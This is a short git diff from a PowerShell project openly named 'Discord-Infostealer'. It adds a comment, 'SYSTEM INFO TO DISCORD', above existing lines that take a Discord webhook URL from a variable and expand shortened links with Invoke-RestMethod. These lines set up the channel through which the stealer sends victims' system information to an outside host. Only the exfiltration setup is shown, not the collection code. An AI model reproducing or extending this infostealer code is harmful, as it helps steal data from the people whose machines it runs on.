diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1 index 4be2c08..3e2efff 100644 --- a/Discord-Infostealer/main.ps1 +++ b/Discord-Infostealer/main.ps1 @@ -1,4 +1,6 @@ -$hookurl = "$dc" +# SYSTEM INFO TO DISCORD + +$hookurl = "$dc" # shortened URL Detection if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url}